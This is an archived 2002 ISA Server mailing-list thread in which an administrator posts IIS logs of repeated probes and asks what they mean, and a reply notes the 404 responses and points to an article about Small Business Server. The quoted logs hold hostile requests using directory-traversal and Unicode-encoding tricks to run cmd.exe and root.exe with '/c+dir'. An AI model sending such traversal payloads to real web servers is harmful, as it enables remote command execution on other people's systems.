RE: !!!!URGENT - SCARY website LOGS!!!!

• From: "Joseph" <cismic@xxxxxxx>
• To: "'[ISAserver.org Discussion List]'" <isalist@xxxxxxxxxxxxx>
• Date: Wed, 27 Mar 2002 00:54:11 -0800

I Sushil,

Tom Shinder wrote an article on SBS that you can find 
At this URL http://www.tacteam.net/isaserverorg/sbsisa.htm

Joseph

-----Original Message-----
From: Sushil Bhalla [mailto:sushilb@xxxxxxxxxxxxxxxxx] 
Sent: Tuesday, March 26, 2002 11:09 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: !!!!URGENT - SCARY website LOGS!!!!

http://www.ISAserver.org


Thanks very much Joseph for your comments.

Actually, I would like to have W2K, E2K, ISA, ISM all on seperate
servers
but I have SBS which limits me to one server only. If there is a way
around this problem, please let me know. I will be very much interested
in
having all the processes on seperate servers.

Regards,

Sushil Bhalla


> It is not always a good idea to keep ISA on the same machine with all
> the other applications that you mentioned. =20
> The 404 error code says that your ok meaning url not found.
> 
> Joseph
> 
> -----Original Message-----
> From: Sushil Bhalla [mailto:sushilb@xxxxxxxxxxxxxxxxx]=20
> Sent: Tuesday, March 26, 2002 10:07 PM
> To: [ISAserver.org Discussion List]
> Subject: [isalist] !!!!URGENT - SCARY website LOGS!!!!
> 
> http://www.ISAserver.org
> 
> 
> Hello All,
> 
> I have W2K, E2K, ISA2K, ISM all installed on one server.
> 
> Recently I have allowed inbound HTTPServer Inbound (port 80)
connection
> (through ISA PACKET FILTERING) to allow my website to be viewed and
> after
> going though my website logs, I got very worried.
> 
> Following is what I am getting my logs every few hours.=20
> 
> Can someone tell me URGENTALLY what kind of request are these? Should
I
> be
> worried? What can I do to prevent these?
> 
> Thanks in advance for any help.
> 
> Sushil Bhalla
> 
> #Date: 2002-03-27 00:19:03
> #Fields: date time c-ip cs-username s-sitename s-computername s-ip
> s-port
> cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes
> cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie)
> cs(Referer)
> 2002-03-27 00:19:03 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80
GET
> /scripts/root.exe /c+dir 404 3 3396 72 15 HTTP/1.0 www - - -
> 2002-03-27 00:19:04 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80
GET
> /MSADC/root.exe /c+dir 404 3 3396 70 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:09 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80
GET
> /c/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:10 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80
GET
> /d/winnt/system32/cmd.exe /c+dir 404 3 3396 80 16 HTTP/1.0 www - - -
> 2002-03-27 00:19:11 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80
GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 96 16
HTTP/1.0
> www - - -
> 2002-03-27 00:19:14 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80
GET
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3
> 3396
> 117 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:19 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80
GET
> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3
> 3396
> 117 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:20 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80
GET
>
/msadc/..%5c../..%5c../..%5c/..=C1=1C../..=C1=1C../..=C1=1C../winnt/syst
e=
> m32/cmd.exe
> /c+dir 404 3 3396 145 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:22 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80
GET
> /scripts/..=C1=1C../winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 =
> HTTP/1.0
> www
> - - -
> 2002-03-27 00:19:23 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80
GET
> /scripts/winnt/system32/cmd.exe /c+dir 404 3 3396 97 15 HTTP/1.0 www -
-
> -
> 2002-03-27 00:19:25 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80
GET
> /winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:27 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80
GET
> /winnt/system32/cmd.exe /c+dir 404 3 3396 97 16 HTTP/1.0 www - - -
> 
> ------------------------------------------------------
> You are currently subscribed to this ISAserver.org Discussion List as:
> cismic@xxxxxxx
> To unsubscribe send a blank email to
$subst('Email.Unsub')

------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as:
cismic@xxxxxxx
To unsubscribe send a blank email to $subst('Email.Unsub')

Other related posts:

• » !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!

1. Home
2. isalist
3. Archive
4. 03-2002

---

• » Previous by Date
• » Next by Date
• » Related Posts
• » View list details
• » Manage your subscription

---